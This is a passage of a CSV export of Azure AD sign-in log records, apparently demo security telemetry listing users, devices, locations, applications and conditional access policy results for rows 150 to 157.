'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 03:54,"{'operatingSystem': 'Windows 10', 'deviceId': '8a35c785-7c5f-463a-ab5e-126c006191f1', 'browser': 'Edge 18.1836', 'displayName': 'YELEVIN-X1', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",534f665b-7e22-44e2-b881-79aeb5cf1b00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.887760162353516, 'latitude': 32.084041595458984}, 'state': 'Hamerkaz', 'city': 'Petah Tikva'}",none,none,none,none,[],{'errorCode': 0},Yechiel Levin,71505601-c694-45ce-8220-4799035a14f5,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,534f665b-7e22-44e2-b881-79aeb5cf1b00,SigninLogs,Sucess,32.0840416,34.88776016
+150,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:23.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 03:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",24b904d7-063a-4f4c-9637-40c752ef0300,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,24b904d7-063a-4f4c-9637-40c752ef0300,SigninLogs,Sucess,33.0175209,35.44601059
+151,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,04:02.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 20:04,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4130ca1d-0d16-4aad-a433-4063d8462100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4130ca1d-0d16-4aad-a433-4063d8462100,SigninLogs,Sucess,33.0175209,35.44601059
+152,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:43.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a6592af5-2274-452e-87fe-30d8e806a757,Microsoft.aadiam,Microsoft.aadiam,,Anisha Mazumder,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 06:36,"{'operatingSystem': 'Windows 10', 'deviceId': '75392852-2598-4dbf-b660-72575bbb649c', 'browser': 'Chrome 80.0.3987', 'displayName': 'DESKTOP-P6BQAS3', 'isCompliant': True, 'trustType': 'Azure AD joined', 'isManaged': True}",9e3c938b-6f3f-4540-a6b6-9cb156d11000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.1082763671875, 'latitude': 47.63346099853515}, 'state': 'Washington', 'city': 'Redmond'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Anisha Mazumder,d7c6f420-22bf-444d-afe4-faa3d43ac95f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,9e3c938b-6f3f-4540-a6b6-9cb156d11000,SigninLogs,Sucess,47.633461,-122.1082764
+153,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:01.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,edc4c676-5c7d-4952-b3e5-3217ca5c14b1,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",368167e5-753b-476f-b20c-ef020c501100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,368167e5-753b-476f-b20c-ef020c501100,SigninLogs,Sucess,33.7984581,-84.38828278
+154,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:39.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e0879587-034d-4c89-b36d-87381344e173,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5ba30877-fe5d-4dc4-8c19-e13f63c81400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,5ba30877-fe5d-4dc4-8c19-e13f63c81400,SigninLogs,Sucess,33.7984581,-84.38828278
+155,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:54.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a78c57a1-79d1-484e-b41e-17bb2a8449e3,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",37105d23-9607-4aeb-a84b-5fa3ef211200,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,37105d23-9607-4aeb-a84b-5fa3ef211200,SigninLogs,Sucess,50.6406517,5.572050095
+156,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:19.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,90e24112-fff1-4ebc-a0ab-43df5a5dfed7,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",669c457e-4441-4eab-88a8-07b757ff1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,669c457e-4441-4eab-88a8-07b757ff1100,SigninLogs,Sucess,33.7984581,-84.38828278
+157,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:59.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,461e7cae-a3f3-4e04-abd3-900490e195b3,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 